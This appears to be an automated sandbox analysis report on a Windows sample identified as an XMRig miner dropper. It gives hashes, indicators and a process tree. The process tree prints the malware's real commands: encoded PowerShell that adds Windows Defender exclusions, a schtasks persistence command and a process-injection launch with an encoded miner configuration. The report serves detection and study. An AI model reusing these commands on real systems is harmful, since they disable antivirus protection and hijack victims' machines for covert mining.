Analysis
-
max time kernel
138s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22-12-2024 05:31
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_3827317e20eedc457ed42abdbdaa802553c5ec7d915afc0e1935c2e04763f576.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
JaffaCakes118_3827317e20eedc457ed42abdbdaa802553c5ec7d915afc0e1935c2e04763f576.exe
Resource
win10v2004-20241007-en
General
-
Target
JaffaCakes118_3827317e20eedc457ed42abdbdaa802553c5ec7d915afc0e1935c2e04763f576.exe
-
Size
4.0MB
-
MD5
5a805a1885c997f1c16dc1139647a2fa
-
SHA1
b9ae32525966e3b0afbaf04b126ed61bb848578d
-
SHA256
3827317e20eedc457ed42abdbdaa802553c5ec7d915afc0e1935c2e04763f576
-
SHA512
5e72ce42323c17617ffc9cfa0e23a42aa27bdbc873d32bebffc854c987281e6422a622ca8b2b3458ebbe40580a2056925bc121afb2a107d2cf7bd54f9bbc8115
-
SSDEEP
98304:/0pw2ok7N2KgY9s8roDXYqK7kPhqsBfz6rDb9ciFSUjWNz:/ww21gCrmYqzk66iiFpjWN
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 16 IoCs
resource yara_rule behavioral1/memory/1796-71-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/1796-75-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/1796-74-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/1796-69-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/1796-67-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/1796-65-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/1796-63-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/1796-61-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/1796-59-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/1796-77-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/1796-57-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/1796-55-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/1796-79-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/1796-81-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/1796-80-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/1796-78-0x0000000140000000-0x0000000140787000-memory.dmp xmrig -
Executes dropped EXE 2 IoCs
pid Process 2764 services.exe 648 sihost64.exe -
Loads dropped DLL 2 IoCs
pid Process 2772 cmd.exe 2764 services.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 3 pastebin.com 4 pastebin.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2764 set thread context of 1796 2764 services.exe 44 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2188 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 1944 powershell.exe 2940 powershell.exe 2244 JaffaCakes118_3827317e20eedc457ed42abdbdaa802553c5ec7d915afc0e1935c2e04763f576.exe 2804 powershell.exe 2516 powershell.exe 2764 services.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe 1796 explorer.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 1944 powershell.exe Token: SeDebugPrivilege 2940 powershell.exe Token: SeDebugPrivilege 2244 JaffaCakes118_3827317e20eedc457ed42abdbdaa802553c5ec7d915afc0e1935c2e04763f576.exe Token: SeDebugPrivilege 2804 powershell.exe Token: SeDebugPrivilege 2516 powershell.exe Token: SeDebugPrivilege 2764 services.exe Token: SeLockMemoryPrivilege 1796 explorer.exe Token: SeLockMemoryPrivilege 1796 explorer.exe -
Suspicious use of WriteProcessMemory 49 IoCs
description pid Process procid_target PID 2244 wrote to memory of 1500 2244 JaffaCakes118_3827317e20eedc457ed42abdbdaa802553c5ec7d915afc0e1935c2e04763f576.exe 28 PID 2244 wrote to memory of 1500 2244 JaffaCakes118_3827317e20eedc457ed42abdbdaa802553c5ec7d915afc0e1935c2e04763f576.exe 28 PID 2244 wrote to memory of 1500 2244 JaffaCakes118_3827317e20eedc457ed42abdbdaa802553c5ec7d915afc0e1935c2e04763f576.exe 28 PID 1500 wrote to memory of 1944 1500 cmd.exe 30 PID 1500 wrote to memory of 1944 1500 cmd.exe 30 PID 1500 wrote to memory of 1944 1500 cmd.exe 30 PID 1500 wrote to memory of 2940 1500 cmd.exe 31 PID 1500 wrote to memory of 2940 1500 cmd.exe 31 PID 1500 wrote to memory of 2940 1500 cmd.exe 31 PID 2244 wrote to memory of 3028 2244 JaffaCakes118_3827317e20eedc457ed42abdbdaa802553c5ec7d915afc0e1935c2e04763f576.exe 33 PID 2244 wrote to memory of 3028 2244 JaffaCakes118_3827317e20eedc457ed42abdbdaa802553c5ec7d915afc0e1935c2e04763f576.exe 33 PID 2244 wrote to memory of 3028 2244 JaffaCakes118_3827317e20eedc457ed42abdbdaa802553c5ec7d915afc0e1935c2e04763f576.exe 33 PID 3028 wrote to memory of 2188 3028 cmd.exe 35 PID 3028 wrote to memory of 2188 3028 cmd.exe 35 PID 3028 wrote to memory of 2188 3028 cmd.exe 35 PID 2244 wrote to memory of 2772 2244 JaffaCakes118_3827317e20eedc457ed42abdbdaa802553c5ec7d915afc0e1935c2e04763f576.exe 36 PID 2244 wrote to memory of 2772 2244 JaffaCakes118_3827317e20eedc457ed42abdbdaa802553c5ec7d915afc0e1935c2e04763f576.exe 36 PID 2244 wrote to memory of 2772 2244 JaffaCakes118_3827317e20eedc457ed42abdbdaa802553c5ec7d915afc0e1935c2e04763f576.exe 36 PID 2772 wrote to memory of 2764 2772 cmd.exe 38 PID 2772 wrote to memory of 2764 2772 cmd.exe 38 PID 2772 wrote to memory of 2764 2772 cmd.exe 38 PID 2764 wrote to memory of 2776 2764 services.exe 39 PID 2764 wrote to memory of 2776 2764 services.exe 39 PID 2764 wrote to memory of 2776 2764 services.exe 39 PID 2776 wrote to memory of 2804 2776 cmd.exe 41 PID 2776 wrote to memory of 2804 2776 cmd.exe 41 PID 2776 wrote to memory of 2804 2776 cmd.exe 41 PID 2776 wrote to memory of 2516 2776 cmd.exe 42 PID 2776 wrote to memory of 2516 2776 cmd.exe 42 PID 2776 wrote to memory of 2516 2776 cmd.exe 42 PID 2764 wrote to memory of 648 2764 services.exe 43 PID 2764 wrote to memory of 648 2764 services.exe 43 PID 2764 wrote to memory of 648 2764 services.exe 43 PID 2764 wrote to memory of 1796 2764 services.exe 44 PID 2764 wrote to memory of 1796 2764 services.exe 44 PID 2764 wrote to memory of 1796 2764 services.exe 44 PID 2764 wrote to memory of 1796 2764 services.exe 44 PID 2764 wrote to memory of 1796 2764 services.exe 44 PID 2764 wrote to memory of 1796 2764 services.exe 44 PID 2764 wrote to memory of 1796 2764 services.exe 44 PID 2764 wrote to memory of 1796 2764 services.exe 44 PID 2764 wrote to memory of 1796 2764 services.exe 44 PID 2764 wrote to memory of 1796 2764 services.exe 44 PID 2764 wrote to memory of 1796 2764 services.exe 44 PID 2764 wrote to memory of 1796 2764 services.exe 44 PID 2764 wrote to memory of 1796 2764 services.exe 44 PID 2764 wrote to memory of 1796 2764 services.exe 44 PID 2764 wrote to memory of 1796 2764 services.exe 44 PID 2764 wrote to memory of 1796 2764 services.exe 44 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_3827317e20eedc457ed42abdbdaa802553c5ec7d915afc0e1935c2e04763f576.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_3827317e20eedc457ed42abdbdaa802553c5ec7d915afc0e1935c2e04763f576.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
-
C:\Windows\system32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2188
-
-
-
C:\Windows\system32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Users\Admin\AppData\Roaming\Microsoft\services.exeC:\Users\Admin\AppData\Roaming\Microsoft\services.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit4⤵
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2516
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"4⤵
- Executes dropped EXE
PID:648
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe hjmtepjezjqro0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRhyomsEanimzL+XPt/OnL5zkmhp4OKKV4oWMsUGWdwsoJudug7VIc6ebqddtMoL+8IBSLOtVFEJNctzsbAFCv5LFA0+pkqqr1nCx8fTFBuMw+OLiwo/SsR3rjZo+bft8oJOnArJgxMPdtfn3m4ICAAM3e2n70xyYsrZgv/mIjZ2s9MaWAVhE4vx5zxn4+fM4NxwQhCGRkaMVzSVPxkc4W4VUXCpA4yUlvFPRJn8S+yy9iUUpnGCywwE6cDcLt5DZIDXewj+xO4xE/aANwcdtidmwr0//85B+3VNT5iZiIC3FLzQE/vsUkNT9YQYUOQPjfBnjL7vzm5Q1ckI01V+0GBIlv+bX5ygP0xmeV9VgfPl4NZiC/LoM58JakN7IxZR/9DzCU+xTFYW50R3bR0l6IO+xdIhsG4X3v9YDNU15Qyzwt23IvvYW3sPOlKmWRLgwD96cvd5iEhR2cumm/yVjL+ep0ofcLS7oFfXR0ilf2PbHlOBAOD/Og2BO6+8Hub5pmAa4t7ZIn5+0N2NOskC6yM8a6D7Dm0+0piBWt4f1GEFQeaPWL5WT2tK8p6lkP4xuY=4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD57055adced066785029966ad17c060efc
SHA16a6c53d8275b7dbb5f930ba50dd7f50474da8063
SHA256eb869e9ba0b10a863aa35ad38faf633826ef7d93cf03db359e2438d5b4a13ff9
SHA51286006ed2836ccf6a9c18f3d8ad4458278432285887e29b655df60d3da89bdeb99b277bf2a757a355536ed6bf54d93c332f1314a0fb3a34c58a33e74a436def7c
-
Filesize
4.0MB
MD55a805a1885c997f1c16dc1139647a2fa
SHA1b9ae32525966e3b0afbaf04b126ed61bb848578d
SHA2563827317e20eedc457ed42abdbdaa802553c5ec7d915afc0e1935c2e04763f576
SHA5125e72ce42323c17617ffc9cfa0e23a42aa27bdbc873d32bebffc854c987281e6422a622ca8b2b3458ebbe40580a2056925bc121afb2a107d2cf7bd54f9bbc8115
-
Filesize
9KB
MD50d8117d686e091d17e3ec9bf8c0f26d9
SHA18265e07f64177c4b647378df8b17f22784cbcc6c
SHA256cd540b5a0e6291b1eef4621cb25abb409693160bb1397438f6d02d7e2966a3fe
SHA5127cf2472a9ecd52445c5e8eca896dea062d9b960f341caede31d479883040efee34602765e89557228336f09dfb4d2c1c44b1b2c1759436dc4fec3749a514ec71